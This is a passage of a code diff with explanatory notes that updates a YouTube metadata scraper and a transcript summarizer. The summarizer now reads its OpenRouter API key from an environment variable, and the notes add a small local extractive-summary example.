+ 'name': channel_name,
+ 'url': channel_url,
+ 'subscribers': channel_subscribers
+ }
+
+ # Extract video description
+ if secondary and 'attributedDescription' in secondary:
+ description_runs = secondary['attributedDescription']['content']
+ result["description"] = description_runs
+ else:
+ result["description"] = "Description not available"
+
+ # Try to extract video duration from player overlay
+ # This is a fallback approach since the original method doesn't work
+ duration_match = re.search(r'"approxDurationMs":"(\d+)"', response.text)
+ if duration_match:
+ duration_ms = int(duration_match.group(1))
+ minutes = duration_ms // 60000
+ seconds = (duration_ms % 60000) // 1000
+ result["duration"] = f"{minutes}:{seconds:02d}"
+ else:
+ result["duration"] = "Duration not available"
+
+ # Extract video tags if available
+ video_tags = []
+ if 'keywords' in data_json.get('metadata', {}).get('videoMetadataRenderer', {}):
+ video_tags = data_json['metadata']['videoMetadataRenderer']['keywords']
+ result["tags"] = ', '.join(video_tags) if video_tags else "No tags available"
+
+ # Extract likes (modern approach)
+ result["likes"] = "Likes count not available"
+ result["dislikes"] = "UNKNOWN" # YouTube no longer shows dislikes
+
+ # Try to find likes in the new structure
+ for content in contents:
+ toggle = (content.get('compositeVideoPrimaryInfoRenderer', {})
+ .get('likeButton', {})
+ .get('toggleButtonRenderer', {}))
+ label = (toggle.get('defaultText', {})
+ .get('accessibility', {})
+ .get('accessibilityData', {})
+ .get('label'))
+ if label and 'like' in label.lower():
+ result["likes"] = label
+
+ return result
+
+ except Exception as e:
+ raise Exception(f"Error extracting video info: {e}") from e
if __name__ == "__main__":
- import argparse
parser = argparse.ArgumentParser(description="YouTube Video Data Extractor")
parser.add_argument("url", help="URL of the YouTube video")
args = parser.parse_args()
+
# parse the video URL from command line
url = args.url
- data = get_video_info(url)
+ try:
+ data = get_video_info(url)
- # print in nice format
- print(f"Title: {data['title']}")
- print(f"Views: {data['views']}")
- print(f"Published at: {data['date_published']}")
- print(f"Video Duration: {data['duration']}")
- print(f"Video tags: {data['tags']}")
- print(f"Likes: {data['likes']}")
- print(f"Dislikes: {data['dislikes']}")
- print(f"\nDescription: {data['description']}\n")
- print(f"\nChannel Name: {data['channel']['name']}")
- print(f"Channel URL: {data['channel']['url']}")
- print(f"Channel Subscribers: {data['channel']['subscribers']}")
+ # print in nice format
+ print(f"Title: {data['title']}")
+ print(f"Views: {data['views']}")
+ print(f"Published at: {data['date_published']}")
+ print(f"Video Duration: {data['duration']}")
+ print(f"Video tags: {data['tags']}")
+ print(f"Likes: {data['likes']}")
+ print(f"Dislikes: {data['dislikes']}")
+ print(f"\nDescription: {data['description']}\n")
+ print(f"\nChannel Name: {data['channel']['name']}")
+ print(f"Channel URL: {data['channel']['url']}")
+ print(f"Channel Subscribers: {data['channel']['subscribers']}")
+
+ except Exception as e:
+ print(f"Error: {e}")
+ print("\nNote: YouTube frequently changes its structure, so this script may need updates.")
\ No newline at end of file
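The core of the rewritten extractor is pulling the embedded `ytInitialData` JSON out of the page with a regex. That pattern can be exercised without hitting YouTube; the HTML below is a fabricated stand-in, not real YouTube markup:

```python
import re
import json

# Fabricated stand-in for a YouTube watch page (not real YouTube markup)
html = '<script>var ytInitialData = {"contents": {"title": "demo"}};</script>'

# Same pattern the script uses: capture the JSON object assigned to ytInitialData
match = re.search(r'var ytInitialData = ({.*?});', html)
data = json.loads(match.group(1))
print(data["contents"]["title"])  # demo
```

The non-greedy `.*?` stops at the first `};`, which works because YouTube emits the blob on one line; if the page structure changes, the regex (not the JSON parsing) is usually what breaks first.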
diff --git a/web-scraping/youtube-transcript-summarizer/youtube_transcript_summarizer.py b/web-scraping/youtube-transcript-summarizer/youtube_transcript_summarizer.py
index 6d4983ef..bdb80f54 100644
--- a/web-scraping/youtube-transcript-summarizer/youtube_transcript_summarizer.py
+++ b/web-scraping/youtube-transcript-summarizer/youtube_transcript_summarizer.py
@@ -1,8 +1,7 @@
import os
-import re
+import sys
import nltk
import pytube
-import youtube_transcript_api
from youtube_transcript_api import YouTubeTranscriptApi
from nltk.corpus import stopwords
from nltk.tokenize import sent_tokenize, word_tokenize
@@ -21,11 +20,17 @@
nltk.download('punkt', quiet=True)
nltk.download('stopwords', quiet=True)
-# Initialize OpenAI client
-client = OpenAI(
- base_url="https://openrouter.ai/api/v1",
- api_key="", # Add your OpenRouter API key here
-)
+# Initialize OpenAI client from environment variable
+# Expect the OpenRouter API key to be provided via OPENROUTER_API_KEY
+api_key = os.getenv("OPENROUTER_API_KEY")
+if not api_key:
+ print(Fore.RED + "Error: the OPENROUTER_API_KEY environment variable is not set.")
+ sys.exit(1)
+client = OpenAI(
+ base_url="https://openrouter.ai/api/v1",
+ api_key=api_key,
+)
def extract_video_id(youtube_url):
"""Extract the video ID from a YouTube URL."""
@@ -48,8 +53,10 @@ def extract_video_id(youtube_url):
def get_transcript(video_id):
"""Get the transcript of a YouTube video."""
try:
- transcript = YouTubeTranscriptApi.get_transcript(video_id)
- return ' '.join([entry['text'] for entry in transcript])
+ youtube_transcript_api = YouTubeTranscriptApi()
+ fetched_transcript = youtube_transcript_api.fetch(video_id)
+ full_transcript = " ".join([snippet.text for snippet in fetched_transcript.snippets])
+ return full_transcript.strip()
except Exception as e:
return f"Error retrieving transcript: {str(e)}."
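When no `OPENROUTER_API_KEY` is available, a fetched transcript can still be condensed locally. A dependency-free sketch of naive extractive summarization (word-frequency sentence scoring; an illustration of the fallback idea, not the script's actual OpenRouter call):

```python
import re
from collections import Counter

def extractive_summary(text: str, n_sentences: int = 2) -> str:
    """Score sentences by summed word frequency; return the top n in original order."""
    sentences = re.split(r'(?<=[.!?])\s+', text.strip())
    freq = Counter(re.findall(r'[a-z]+', text.lower()))

    def score(i):
        # A sentence's score is the sum of its words' corpus frequencies
        return sum(freq[w] for w in re.findall(r'[a-z]+', sentences[i].lower()))

    top = sorted(sorted(range(len(sentences)), key=score, reverse=True)[:n_sentences])
    return ' '.join(sentences[i] for i in top)

text = "Python is great. Python powers scripts. Cats sleep."
print(extractive_summary(text, 2))  # Python is great. Python powers scripts.
```

Frequency scoring favors sentences built from the transcript's dominant vocabulary, which is a rough but serviceable stand-in when an LLM summary is not an option.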